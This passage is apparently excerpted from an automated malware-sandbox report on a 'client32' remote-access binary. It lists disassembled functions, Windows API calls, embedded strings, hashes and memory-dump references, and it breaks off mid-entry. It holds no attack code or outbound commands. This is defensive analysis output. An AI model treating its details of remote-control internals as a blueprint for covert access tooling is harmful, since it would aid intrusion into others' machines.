                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$CritiusernitializeSection_malloc_memsetwsprintf
                                                                                                                                                    • String ID: ConfigList$PCICTL
                                                                                                                                                    • API String ID: 4014706405-1939909508
                                                                                                                                                    • Opcode ID: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                                                                                                    • Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
                                                                                                                                                    • Opcode Fuzzy Hash: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                                                                                                    • Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
                                                                                                                                                    Function 6CA86DF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 6CA86DFD
                                                                                                                                                    • #16.WSOCK32(6CA8A730,?,00000001,00000000,?,6CA8A730,?,00002000,,?,6CA8ACF4,00000000,00000000,?,?,00000010), ref: 6CA86E4C
                                                                                                                                                    • WSASetLastError.WSOCK32(00002747,?,6CA8A730,?,00002000,,?,6CA8ACF4,00000000,00000000,?,?,00000010,00000002,00000001,00000000), ref: 6CA86F25
                                                                                                                                                    • WSASetLastError.WSOCK32(00002745,6CA8A730,?,00000001,00000000,?,6CA8A730,?,00002000,,?,6CA8ACF4,00000000,00000000,?,?), ref: 6CA86F36
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_memset
                                                                                                                                                    • String ID: $Content-Length:$HTTP/
                                                                                                                                                    • API String ID: 536390146-1146010681
                                                                                                                                                    • Opcode ID: 780f7d3419983939c4e23a698671664c7937795d6a2b78b35e8711f83c7d718b
                                                                                                                                                    • Instruction ID: 349a28fec47bdd52374fa0b84f5884e417201ecf26d7b42cbf16dd487466d390
                                                                                                                                                    • Opcode Fuzzy Hash: 780f7d3419983939c4e23a698671664c7937795d6a2b78b35e8711f83c7d718b
                                                                                                                                                    • Instruction Fuzzy Hash: 6E312E626273016BF7019AA5DE54BAB32785F4030DF180628ED18C7B81FB24E9DE82B1
                                                                                                                                                    Function 11027690 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110276E1
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110276EB
                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 11027774
                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$DispatchSleepTranslate
                                                                                                                                                    • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                                                                                    • API String ID: 3237117195-3850961587
                                                                                                                                                    • Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                                                                                    • Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
                                                                                                                                                    • Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                                                                                    • Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1
                                                                                                                                                    Function 110B9550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
                                                                                                                                                    • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
                                                                                                                                                    • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                                                                                    • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                                                                                    • API String ID: 1092798621-1973987134
                                                                                                                                                    • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                                                                                    • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                                                                                                    • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                                                                                    • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                                                                                                    Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                    • String ID: bad cast
                                                                                                                                                    • API String ID: 2427920155-3145022300
                                                                                                                                                    • Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                                                                                    • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                                                                                                    • Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                                                                                    • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                                                                                                    Function 11135700 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000027C,000003E8), ref: 1113572F
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1113578C
                                                                                                                                                      • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                                                                                    • wsprintfA.USER32 ref: 111357BC
                                                                                                                                                      • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000027C,000003E8), ref: 11135802
                                                                                                                                                    Strings
                                                                                                                                                    • Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
                                                                                                                                                    • UI.CPP, xrefs: 111357E9
                                                                                                                                                    • ResponseChk, xrefs: 11135717
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountObjectSingleTickWait$ExitProcesswsprintf
                                                                                                                                                    • String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
                                                                                                                                                    • API String ID: 2020353970-2880927372
                                                                                                                                                    • Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                                                                                    • Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
                                                                                                                                                    • Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                                                                                    • Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91
                                                                                                                                                    Function 110F1600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                                                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                                                                                                    • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                                                                                    • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                                                                                    • API String ID: 1318148156-3179819359
                                                                                                                                                    • Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                                                                                    • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                                                                                                    • Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                                                                                    • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                                                                                                    Function 110817B0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memmove.LIBCMT ref: 11081859
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                    • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                                                                                    • API String ID: 1528188558-3417006389
                                                                                                                                                    • Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                                                                                    • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                                                                                                    • Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                                                                                    • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                                                                                                    Function 1103F720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 1103F7F2
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 1103F7E1
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 3726914545-2830328467
                                                                                                                                                    • Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                                                                                    • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                                                                                                    • Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                                                                                    • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
                                                                                                                                                    Function 1115F620 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                                                                                                    • _memset.LIBCMT ref: 1115F64B
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                                                                                      • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                                                                                      • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
                                                                                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
